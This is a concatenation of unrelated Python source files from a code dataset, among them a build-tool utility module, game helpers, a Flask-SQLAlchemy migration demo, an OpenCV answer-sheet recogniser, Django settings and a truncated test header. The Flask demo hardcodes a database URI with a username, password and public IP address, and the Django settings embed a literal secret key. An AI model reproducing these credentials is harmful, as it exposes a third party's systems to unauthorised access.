snippets/main.py\n","sub_path":"abc192/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"459490600","text":"# Copyright (C) 2015 Niklas Rosenstein\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nfrom . import dis\nfrom . import ident\nfrom . import lists\nfrom . import path\nfrom . import proxy\nfrom . import shell\nimport os\nimport sys\nimport errno\nimport craftr\nimport collections\nimport zipfile\n\n\nclass DataEntity(object):\n ''' Container for data of a module or a script. 
'''\n\n  def __init__(self, entity_id):\n    super().__init__()\n    self.__entity_id__ = entity_id\n\n  def __repr__(self):\n    return '<DataEntity {0!r}>'.format(self.__entity_id__)\n\n\ndef singleton(x):\n  ''' Decorator for a singleton class or function. The class or\n  function will be called and the result returned. '''\n\n  return x()\n\n\ndef accept_keys(dictionary, keys, name='key'):\n  ''' This function ensures that the *dictionary* only contains the\n  specified *keys*. *keys* can be a string in which case it is split\n  by whitespace or comma. A `TypeError` is raised if an invalid key\n  is detected. '''\n\n  if isinstance(keys, str):\n    if ',' in keys:\n      keys = keys.split(',')\n    else:\n      keys = keys.split()\n  invalids = set(dictionary.keys()).difference(set(keys))\n  if invalids:\n    key = next(iter(invalids))\n    raise TypeError('unexpected {} {!r}'.format(name, key))\n\n\ndef get_calling_module(module=None):\n  ''' Call this from a rule function to retrieve the craftr module that\n  was calling the function from the stackframe. If the module cannot be\n  retrieved, a `RuntimeError` is raised. '''\n\n  if module is None:\n    frame = sys._getframe(2) # get_calling_module() - rule - module\n    if 'module' not in frame.f_globals:\n      raise RuntimeError('could not read \"module\" variable')\n    module = proxy.resolve_proxy(frame.f_globals['module'])\n  else:\n    module = proxy.resolve_proxy(module)\n\n  if not isinstance(module, craftr.runtime.Module):\n    raise RuntimeError('\"module\" is not a Module object')\n  return module\n\n\nclass CommandBuilder(object):\n  ''' This is a helper class to generate commands based on a set\n  of options. These options can be passed to `__call__()` to generate\n  the result list.\n\n      builder = CommandBuilder(['clang++', '-c', '-arch', 'x86_amd64'])\n      builder.switch('debug',\n        enabled=['-g', '-O0'],\n        disabled=['-O3'])\n      command = builder(debug=True)\n  '''\n\n  def __init__(self, base=()):\n    super().__init__()\n    self._parts = []\n    self.append(base)\n\n  def __call__(self, **options):\n    ''' Generate the list using the specified *\*\*options*. '''\n\n    result = []\n    for part in self._parts:\n      if part['type'] == 'append_args':\n        result.extend(part['args'])\n      elif part['type'] == 'append_func':\n        args = part['func'](options)\n        result.extend(lists.autoexpand(args))\n      elif part['type'] == 'switch':\n        value = options.get(part['name'], None)\n        if part['func']:\n          args = part['func'](value)\n          result.extend(lists.autoexpand(args))\n        if value:\n          result.extend(part['enabled'])\n        else:\n          result.extend(part['disabled'])\n      else:\n        raise RuntimeError('invalid part type {!r}'.format(part['type']))\n    return result\n\n  def append(self, flags):\n    ''' This function acts differently based on the type of *flags*. If\n    it is a function, it will be called with a dictionary of all options\n    as the first argument and the return value must be a list that will\n    be appended to the result. Otherwise, *flags* is assumed to be a\n    sequence that is directly appended to the result. All values are\n    expanded using `lists.autoexpand()`. '''\n\n    if callable(flags):\n      self._parts.append({\n        'type': 'append_func',\n        'func': flags})\n      return flags\n    elif isinstance(flags, collections.Iterable):\n      self._parts.append({\n        'type': 'append_args',\n        'args': lists.autoexpand(flags)})\n    else:\n      raise TypeError('flags must be callable or iterable')\n\n  def switch(self, option, func=None, enabled=(), disabled=()):\n    ''' If the option is enabled (ie. given and True), append the\n    *enabled* items to the result, otherwise append *disabled*. 
If\n *func* is given, it is passed the values of *option* as the\n first argument.\n\n The *enabled* and *disabled* lists and the return value of\n *func* are expanded using the `lists.autoexpand()` function. '''\n\n if func and not callable(func):\n raise TypeError('func must be callable')\n self._parts.append({\n 'type': 'switch',\n 'name': option,\n 'func': func,\n 'enabled': lists.autoexpand(enabled),\n 'disabled': lists.autoexpand(disabled)})\n\n\ndef build_archive(filename, base_dir, include=(), exclude=(),\n prefix=None, quiet=False):\n ''' Build a ZIP archive at *filename* and include the specified files.\n The *base_dir* is stripped from the absolute filenames to find the\n arcname. '''\n\n include = [path.normpath(x, base_dir) for x in lists.autoexpand(include)]\n exclude = [path.normpath(x, base_dir) for x in lists.autoexpand(exclude)]\n files = set(include) - set(exclude)\n\n if not files:\n raise ValueError('no files to build an archive from')\n\n for fn in files:\n if not os.path.exists(fn):\n raise OSError(errno.ENOENT, 'No such file or directory: {!r}'.format(fn))\n\n zf = zipfile.ZipFile(filename, 'w')\n for fn in files:\n arcname = path.relpath(fn, base_dir).replace('\\\\', '/')\n if arcname == os.curdir or arcname.startswith(os.pardir):\n raise ValueError('pathname not a subdir of basedir', fn, base_dir)\n if prefix:\n arcname = prefix + '/' + arcname\n if not quiet:\n craftr.logging.clear_line()\n print('writing {!r}... '.format(arcname), end='')\n zf.write(fn, arcname)\n if not quiet:\n print('done.', end='')\n zf.close()\n if not quiet:\n craftr.logging.clear_line()\n print('{} files compressed in {!r}'.format(len(files), filename))\n","sub_path":"craftr/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"165415119","text":"# User input testing\nkeysPressed = []\ndef testKeyPressed(key):\n return key in keysPressed\n\n# Overlap detection\ndef testSpriteOverlap(sprite1,sprite2):\n noOverlap = ((sprite1.rightSide <= sprite2.leftSide) or\n (sprite2.rightSide <= sprite1.leftSide) or\n (sprite1.bottomSide <= sprite2.topSide) or\n (sprite2.bottomSide <= sprite1.topSide))\n return not noOverlap\n\n# Creates a moving background (for games like Galaga) - 2 Background Sprites needed\ndef backgroundWrap(background,background2,speed):\n if background.x >= -720:\n background.moveSprite(speed,0)\n background2.moveSprite(speed,0)\n else:\n background.x = 0\n background2.x = 720\n background.moveSprite(speed,0)\n background2.moveSprite(speed,0)\n\n background.updateSprite()\n background2.updateSprite()\n\n###########\n# Colors! 
#\n###########\n\nWHITE = (255,255,255)\nGREEN = (0,255,0)\nRED = (255,0,0)\nBLUE = (0,0,255)\nBLACK = (0,0,0)\nGREY = (160,160,160)\nFUCHSIA = (255, 0, 255)\nGRAY = (128, 128, 128)\nLIME = (0, 128, 0)\nMAROON = (128, 0, 0)\nNAVYBLUE = (0, 0, 128)\nOLIVE = (128, 128, 0)\nPURPLE = (128, 0, 128)\nTEAL = (0,128,128)","sub_path":"src/core/HelperFunctions.py","file_name":"HelperFunctions.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"50518673","text":"from flask_migrate import Migrate, MigrateCommand\nfrom flask import Flask\nfrom flask_script import Shell, Manager\nfrom flask_sqlalchemy import SQLAlchemy\n\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://jhonchen:2553522375@47.100.200.127:3306/flask_practice'\napp.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\nmanager = Manager(app)\n\nmigrate = Migrate(app, db)\n\"\"\"manager is the Flask-Script instance; this statement adds a db command to Flask-Script\"\"\"\nmanager.add_command('db', MigrateCommand)\n\n\nclass Role(db.Model):\n    __tablename__ = 'roles'\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String(64), unique=True)\n\n    users = db.relationship('User', backref='role')\n\n    def __repr__(self):\n        return '<Role %r>' % self.name\n\n\nclass User(db.Model):\n    __tablename__ = 'users'\n    id = db.Column(db.Integer, primary_key=True)\n    username = db.Column(db.String(64), unique=True, index=True)\n\n    role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))\n\n    def __repr__(self):\n        return '<User %r>' % self.username\n\n\n@app.route('/')\ndef index():\n    return 'Hello World!'\n\n\nif __name__ == \"__main__\":\n    # The crude way to update existing database tables is to drop the old tables and recreate them\n    db.drop_all()\n    db.create_all()\n    # The code below creates a few users.\n    admin_role = Role(name='Admin')\n    mod_role = Role(name='Moderator')\n    user_role = Role(name='User')\n    user_jhon = User(username='jhon', role=admin_role)\n    user_susan = User(username='susan', role=user_role)\n    user_david = User(username='david', role=user_role)\n\n    db.session.add_all([admin_role, mod_role, user_role, user_david, user_jhon, user_susan])\n    db.session.commit()\n    manager.run()\n\n\"\"\"After reviewing and correcting the migration script, we can apply the migration to the database with the db upgrade command:\n(venv) E:\\GitHub\\Code_Practice\\F_flask\\Part4_数据库>python demo8_数据库迁移.py db upgrade\nINFO [alembic.runtime.migration] Context impl MySQLImpl.\nINFO [alembic.runtime.migration] Will assume non-transactional DDL.\n\n(venv) E:\\GitHub\\Code_Practice\\F_flask\\Part4_数据库>\n For the first migration this has the same effect as calling db.create_all(); in subsequent migrations, however, the upgrade command applies the changes to the database without\n affecting the data stored in it.\"\"\"","sub_path":"F_flask/Part4_数据库/demo9_数据库操作.py","file_name":"demo9_数据库操作.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"269046075","text":"# Looping Through A Dictionary.\nuser_0 = {\n\t'username': 'efermi',\n\t'first': 'enrico',\n\t'last': 'fermi',\n\t}\n\n# To see all information stored in dictionary use a for loop.\nfor key, value in user_0.items():\n\tprint(f\"\\nKey: {key}\")\n\tprint(f\"Value: {value}\")\n# items() method following the name of the dictionary returns a list of key-\n# value pairs.\n\n# Many users. 
Dictionary inside a dictionary.\nusers = {\n\t'aeinstein': {\n\t\t'first': 'albert',\n\t\t'last': 'einstein',\n\t\t'location': 'princeton',\n\t\t},\n\t'mcurie': {\n\t\t'first': 'marie',\n\t\t'last': 'curie',\n\t\t'location': 'paris',\n\t\t},\n\t}\n\nfor username, user_info in users.items():\n\tprint(f\"\\nUsername: {username}\")\n\tfull_name = f\"{user_info['first']} {user_info['last']}\"\n\tlocation = user_info['location']\n\n\tprint(f\"\\tFull Name: {full_name.title()}\")\n\tprint(f\"\\tLocation: {location.title()}\")","sub_path":"user_ch6.py","file_name":"user_ch6.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"3221596","text":"import cv2\nimport imutils\nimport numpy as np\n\nfrom utils import helper\n\n\ndef recoginze(filename, opt, dst=None):\n image = cv2.imread(filename, 0)\n\n image = cv2.GaussianBlur(image, (5, 5), 0)\n image = helper.adjust_gamma(image, opt['gamma'])\n\n maso, de, dapan = '', '', []\n\n if opt['detect_conners'] == 1:\n image = helper.detect_conners(image)\n\n if image is None:\n print(\"ERROR\")\n return maso, de, dapan\n\n image = cv2.resize(image, (opt['width'], opt['height']))\n\n h, w = image.shape[:2]\n ratio = h / w\n h_new = 500\n w_new = int(h_new / ratio)\n\n maso_cols = opt['num_maso']\n made_cols = opt['num_made']\n top = opt['top']\n bot = opt['bottom']\n left1 = opt['left_1']\n left2 = opt['left_2']\n dapan_sec = opt['dapan_sec']\n maso_sec = opt['maso_sec']\n dapan_each = opt['dapan_each']\n warpeds = [\n [top, bot, int(w * dapan_sec['sec_1']['left']), int(w * dapan_sec['sec_1']['right'])],\n [top + 10, bot, int(w * dapan_sec['sec_2']['left']), int(w * dapan_sec['sec_2']['right'])],\n [top + 10, bot, int(w * dapan_sec['sec_3']['left']), int(w * dapan_sec['sec_3']['right'])],\n [top, bot, int(w * dapan_sec['sec_4']['left']), int(w * dapan_sec['sec_4']['right'])],\n [maso_sec['top'], maso_sec['bot'], int(w * maso_sec['left']), int(w * maso_sec['right'])]\n ]\n\n count = 0\n cau = 1\n error = False\n error_msg = []\n for index, warp in enumerate(warpeds):\n try:\n warped = image[warp[0]:warp[1], warp[2]:warp[3]]\n warped = helper.adjust_gamma(warped, 0.8)\n\n thresh = cv2.threshold(warped, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n\n cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if imutils.is_cv2() else cnts[1]\n\n cnt_dict = {}\n cntsl = []\n for c in cnts:\n (x, y, w, h) = cv2.boundingRect(c)\n ar = w / float(h)\n\n if w >= 18 and h >= 18 and 0.6 <= ar <= 1.7 and x > 0 and y > 0:\n mask = np.zeros(thresh.shape, dtype=\"uint8\")\n\n cv2.drawContours(mask, [c], -1, 255, -1)\n\n mask = cv2.bitwise_and(thresh, thresh, mask=mask)\n total = cv2.countNonZero(mask)\n\n cnt_dict[str(x) + '-' + str(y)] = total\n cntsl.append((x, y))\n\n cntsl = sorted(cntsl, key=lambda x: x[1])\n cntsl, cnt_dict = helper.normalize_y(cntsl, cnt_dict)\n\n if index >= 4:\n step = maso_cols + made_cols\n else:\n step = 4\n\n cntsl = helper.sort_x(cntsl)\n cntsc, cnt_dict = helper.clean(cntsl, cnt_dict, step=step)\n if index >= 4:\n skip = 0\n for c in cntsc[1:step]:\n if c[1] == cntsc[0][1]:\n skip += 1\n else:\n cntsc = cntsc[skip:]\n break\n if cntsc[0][1] != cntsc[1][1]:\n rot_x = warp[2] + cntsc[1][0] + 60\n rot_y = warp[0] + cntsc[1][1] - 20\n else:\n rot_x = warp[2] + cntsc[0][0] + 60\n rot_y = warp[0] + cntsc[0][1] - 20\n rot_x1 = rot_x - left1\n rot_y1 = rot_y\n rot_x2 = rot_x\n rot_y2 = rot_y + 600\n 
cv2.rectangle(image, (rot_x1, rot_y1), (rot_x2, rot_y2), (0, 0, 0), 5)\n\n cntscc = []\n for j, c in enumerate(cntsc):\n x, y = c\n\n if not (rot_x1 < warp[2] + x < rot_x2 and rot_y1 < warp[0] + y < rot_y2):\n continue\n\n cntscc.append((x, y))\n\n sec = maso_cols + made_cols\n if len(cntscc) <= sec * 10 - 6:\n error = True\n cntsl = sorted(cntscc, key=lambda kk: kk[1])\n cntsc, cnt_dict = helper.normalize_x(cntsl, cnt_dict, step=step, num_sec=sec * 10)\n\n result_dict = {}\n row = -1\n for i, c in enumerate(cntsc):\n x, y = c\n\n total = cnt_dict[str(x) + '-' + str(y)]\n\n col = i % sec\n if col == 0:\n row += 1\n\n if col % 2 != 0:\n threshold = helper.THRESHOLD\n else:\n threshold = helper.THRESHOLDH\n\n # cv2.putText(image, str(total), (warp[2] + x, warp[0] + y),\n # cv2.FONT_HERSHEY_SIMPLEX, 0.75,\n # (0, 0, 255), 3, cv2.LINE_AA)\n\n try:\n curr = result_dict[i % sec][0]\n if total > curr and total >= threshold:\n result_dict[i % sec] = (total, row)\n\n cv2.putText(image, str(row), (warp[2] + x, warp[0] + y),\n cv2.FONT_HERSHEY_SIMPLEX, 1.5,\n (0, 0, 255), 3, cv2.LINE_AA)\n except KeyError as _:\n result_dict[i % sec] = (total, row)\n if total >= threshold:\n cv2.putText(image, str(row), (warp[2] + x, warp[0] + y),\n cv2.FONT_HERSHEY_SIMPLEX, 1.5,\n (0, 0, 255), 3, cv2.LINE_AA)\n\n for i in range(maso_cols):\n try:\n maso += str(result_dict[maso_cols + made_cols - 1 - i][1])\n except KeyError as _:\n error = True\n error_msg.append('Lỗi ko có mã số ở cột ' + str(i))\n maso += '0'\n\n for i in range(made_cols):\n try:\n de += str(result_dict[made_cols - 1 - i][1])\n except KeyError as _:\n error = True\n error_msg.append('Lỗi ko có đề ở cột ' + str(maso_cols + i))\n de += '0'\n\n else:\n if cntsc[0][1] != cntsc[1][1]:\n rot_x = warp[2] + cntsc[1][0] + 60\n rot_y = warp[0] + cntsc[1][1] - 20\n else:\n rot_x = warp[2] + cntsc[0][0] + 60\n rot_y = warp[0] + cntsc[0][1] - 20\n rot_x1 = rot_x - left2\n rot_y1 = rot_y\n rot_x2 = rot_x\n rot_y2 = rot_y + 1300\n cv2.rectangle(image, (rot_x1, rot_y1), (rot_x2, rot_y2), (0, 0, 0), 5)\n\n cntscc = []\n for j, c in enumerate(cntsc):\n x, y = c\n\n if not (rot_x1 < warp[2] + x < rot_x2 and rot_y1 < warp[0] + y < rot_y2):\n continue\n\n cntscc.append((x, y))\n\n if len(cntscc) <= dapan_each * 4 - 6:\n error = True\n\n cntsl = sorted(cntscc, key=lambda kk: kk[1])\n cntsc, cnt_dict = helper.normalize_x(cntsl, cnt_dict, step=step, num_sec=dapan_each * 4)\n\n bubbled = (helper.THRESHOLD, 99)\n yy = 3\n prev = None\n cx, cy = None, None\n row = 0\n for i, c in enumerate(cntsc):\n x, y = c\n\n if not (rot_x1 < warp[2] + x < rot_x2 and rot_y1 < warp[0] + y < rot_y2):\n continue\n\n if cx is None or cy is None:\n cx, cy = x, y\n\n if (count + 1) % 4 == 0 and prev is not None and prev[1] != y:\n answer = helper.ANSWER_KEY[99]\n dapan.append({\"cau\": str(cau), \"answer\": answer})\n cv2.putText(image, answer, (warp[2] + prev[0], warp[0] + prev[1]),\n cv2.FONT_HERSHEY_SIMPLEX, 1.5,\n (0, 0, 255), 3, cv2.LINE_AA)\n\n if row % 2 != 0:\n bubbled = (helper.THRESHOLD, 99)\n else:\n bubbled = (helper.THRESHOLDH, 99)\n cau += 1\n yy = 3\n count += 1\n\n total = cnt_dict[str(x) + '-' + str(y)]\n\n if bubbled is not None and total >= bubbled[0]:\n bubbled = (total, yy)\n cx, cy = x, y\n\n # cv2.putText(image, str(total), (warp[2] + x, warp[0] + y),\n # cv2.FONT_HERSHEY_SIMPLEX, 0.9,\n # (0, 0, 255), 2, cv2.LINE_AA)\n\n count += 1\n yy -= 1\n if count % 4 == 0:\n if bubbled is not None:\n k = bubbled[1]\n if k != 99:\n answer = helper.ANSWER_KEY[k % 4]\n else:\n answer 
= helper.ANSWER_KEY[k]\n cx, cy = x - 40, y\n else:\n answer = helper.ANSWER_KEY[99]\n cx, cy = x - 40, y\n\n dapan.append({\"cau\": str(cau), \"answer\": answer})\n cv2.putText(image, answer, (warp[2] + cx, warp[0] + cy),\n cv2.FONT_HERSHEY_SIMPLEX, 1.5,\n (0, 0, 255), 3, cv2.LINE_AA)\n\n if row % 2 != 0:\n bubbled = (helper.THRESHOLD, 99)\n else:\n bubbled = (helper.THRESHOLDH, 99)\n cau += 1\n row += 1\n yy = 3\n\n prev = c\n\n if row > dapan_each:\n row = 0\n\n if cau > opt['num_cau']:\n break\n\n cv2.rectangle(image, (warp[2], warp[0]), (warp[3], warp[1]), (0, 0, 0), 2)\n\n except Exception as e:\n print(e)\n continue\n\n if error is True:\n print(\"ERROR\")\n return 'error', 'error', []\n elif dst is not None:\n image = cv2.resize(image, (w_new, h_new))\n cv2.imwrite(filename, image)\n\n return maso, de, dapan\n","sub_path":"utils/recoginze_one.py","file_name":"recoginze_one.py","file_ext":"py","file_size_in_byte":10726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"350295115","text":"x = input().split(' ')\na = int(x[0])\nb = int(x[1])\ncont = 1\nwhile b < 1:\n if b < 1:\n b = int(x[1+cont])\n cont+=1\n if b > 0:\n break\nsoma = 0\nvb = b\nvar = 0\nwhile True:\n if vb > 0:\n soma += a + var\n var+=1\n vb-=1\n if vb==0:\n break\nprint(soma)\n","sub_path":"inteiros_consecutivos.py","file_name":"inteiros_consecutivos.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"494380417","text":"# Copyright (c) 2015, Alphamonak Solutions Ltd. \n# License: GNU General Public License v3. See license.txt\n\nfrom __future__ import unicode_literals\nimport redapp\nfrom redapp.utils import cstr, filter_strip_join\nfrom redapp.website.website_generator import WebsiteGenerator\nfrom redapple.utilities.address_and_contact import load_address_and_contact\n\nclass SalesPartner(WebsiteGenerator):\n\twebsite = redapp._dict(\n\t\tpage_title_field = \"partner_name\",\n\t\tcondition_field = \"show_in_website\",\n\t\ttemplate = \"templates/generators/sales_partner.html\"\n\t)\n\n\tdef onload(self):\n\t\t\"\"\"Load address and contacts in `__onload`\"\"\"\n\t\tload_address_and_contact(self, \"sales_partner\")\n\n\tdef autoname(self):\n\t\tself.name = self.partner_name\n\n\tdef validate(self):\n\t\tself.parent_website_route = \"partners\"\n\t\tsuper(SalesPartner, self).validate()\n\t\tif self.partner_website and not self.partner_website.startswith(\"http\"):\n\t\t\tself.partner_website = \"http://\" + self.partner_website\n\n\tdef get_contacts(self, nm):\n\t\tif nm:\n\t\t\treturn redapp.db.convert_to_lists(redapp.db.sql(\"\"\"\n\t\t\t\tselect name, CONCAT(IFNULL(first_name,''),\n\t\t\t\t\t' ',IFNULL(last_name,'')),contact_no,email_id\n\t\t\t\tfrom `tabContact` where sales_partner = %s\"\"\", nm))\n\t\telse:\n\t\t\treturn ''\n\n\tdef get_context(self, context):\n\t\taddress = redapp.db.get_value(\"Address\",\n\t\t\t{\"sales_partner\": self.name, \"is_primary_address\": 1},\n\t\t\t\"*\", as_dict=True)\n\t\tif address:\n\t\t\tcity_state = \", \".join(filter(None, [address.city, address.state]))\n\t\t\taddress_rows = [address.address_line1, address.address_line2,\n\t\t\t\tcity_state, address.pincode, address.country]\n\n\t\t\tcontext.update({\n\t\t\t\t\"email\": address.email_id,\n\t\t\t\t\"partner_address\": filter_strip_join(address_rows, \"\\n
    \"),\n\t\t\t\t\"phone\": filter_strip_join(cstr(address.phone).split(\",\"), \"\\n
    \")\n\t\t\t})\n\n\t\treturn context\n","sub_path":"redapple/setup/doctype/sales_partner/sales_partner.py","file_name":"sales_partner.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"248317062","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\n\nhere = lambda * x: os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(__file__)), *x))\n\nPROJECT_NAME = 'src'\nPROJECT_ROOT = here('../..')\n\nroot = lambda * x: os.path.abspath(os.path.join(os.path.abspath(PROJECT_ROOT), *x))\n\nsys.path.insert(0, root('src'))\nsys.path.insert(0, PROJECT_ROOT)\nsys.path.insert(0, root('apps'))\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nADMINS = []\nMANAGERS = ADMINS\n\nAUTH_USER_MODEL = 'profile.User'\n\nDATETIME_FORMAT = 'Y-m-d H:i:s'\nDATE_FORMAT = 'Y-m-d H:i:s'\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'kotel',\n 'USER': 'root',\n 'PASSWORD': '',\n 'HOST': '127.0.0.1',\n 'PORT': '',\n }\n}\n\nALLOWED_HOSTS = []\nTIME_ZONE = 'Asia/Bishkek'\nLANGUAGE_CODE = 'en-us'\nSITE_ID = 1\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nMEDIA_ROOT = os.path.join(PROJECT_ROOT, 'public', 'media')\nSTATIC_ROOT = os.path.join(PROJECT_ROOT, 'public', 'static')\nMEDIA_URL = '/media/'\nSTATIC_URL = '/static/'\nFILE_UPLOAD_MAX_MEMORY_SIZE = 4194304 # 4mb\nUPLOADS_DIR_NAME = 'uploads'\nDEFAULT_CHARSET = 'utf-8'\nANONYMOUS_USER_ID = -1\nLOGIN_URL = '/login/'\nLOGIN_REDIRECT_URL = 'orders:list'\nDOMAIN_NAME = 'http://localhost'\nWWW_ROOT = PROJECT_ROOT\nIS_DEV = False\nIS_PROD = False\n\n# Place order into main stream 15 minutes before\n# it actually should be taken\nDELAYED_MIN_NOTIFY = 900\n\n# Test related stuffs\nTEST_RUNNER = 'django_nose.NoseTestSuiteRunner'\nSOUTH_TESTS_MIGRATE = False # To disable migrations and use syncdb instead\nSKIP_SOUTH_TESTS = True # To disable South's own unit tests\n\n# Get the ENV setting. 
Needs to be set in .bashrc or similar.\nENV = os.getenv('ENV')\n\nif not ENV:\n raise Exception('Environment variable ENV is requried!')\n\n\nSTATICFILES_DIRS = [\n ('global', root(PROJECT_NAME, 'static')),\n]\n\n\nSTATICFILES_FINDERS = [\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder',\n]\n\n\nSECRET_KEY = 'la7wrs6ov_%qyebo&s__5k37*46sgea2%y+ysx0wx-sy9ir#rl'\n\nTEMPLATE_LOADERS = [\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n]\n\nMIDDLEWARE_CLASSES = [\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nTEMPLATE_CONTEXT_PROCESSORS = [\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.request',\n 'django.core.context_processors.tz',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n\n]\n\n\nROOT_URLCONF = 'urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'src.wsgi.application'\n\nTEMPLATE_DIRS = [root('src', 'templates')]\n\n\nCONTRIB_APPS = [\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n]\n\n\nOTHER_APPS = [\n 'south',\n 'compressor',\n]\n\n\nOUR_APPS = [\n 'profile',\n 'orders',\n]\n\n\n# For Jenkins\nPROJECT_APPS = OUR_APPS\n\nINSTALLED_APPS = CONTRIB_APPS + OTHER_APPS + OUR_APPS\n\nif 'test' in sys.argv:\n COVER_APPS = ','.join(sys.argv[2:])\nelse:\n COVER_APPS = ','.join(OUR_APPS)\n\n\n\nZLIB_COMPRESSION_LEVEL = 2 # Compression level for zlib to provide data for navigators\n\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n\ndef extend_list_avoid_repeats(list_to_extend, extend_with):\n \"\"\"\n Extends the first list with the elements in the second one,\n making sure its elements are not already there in the original list.\n \"\"\"\n list_to_extend.extend(filter(lambda x: not list_to_extend.count(x), extend_with))\n","sub_path":"src/settings/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"444799383","text":"# MIT License\n#\n# Copyright (c) 2018-2020 Red Hat, Inc.\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit 
persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\"\"\"\nThese tests require a psql database with a schema:\n```\nexport POSTGRESQL_USER=packit\nexport POSTGRESQL_PASSWORD=secret-password\nexport POSTGRESQL_DATABASE=packit\nexport POSTGRESQL_SERVICE_HOST=0.0.0.0\n$ docker-compose -d postgres\n$ alembic upgrade head\n```\n\"\"\"\nfrom datetime import datetime, timedelta\n\nimport pytest\nfrom sqlalchemy.exc import ProgrammingError\n\nfrom packit_service.models import (\n CoprBuild,\n get_sa_session,\n SRPMBuild,\n PullRequest,\n GitProject,\n)\n\nTARGET = 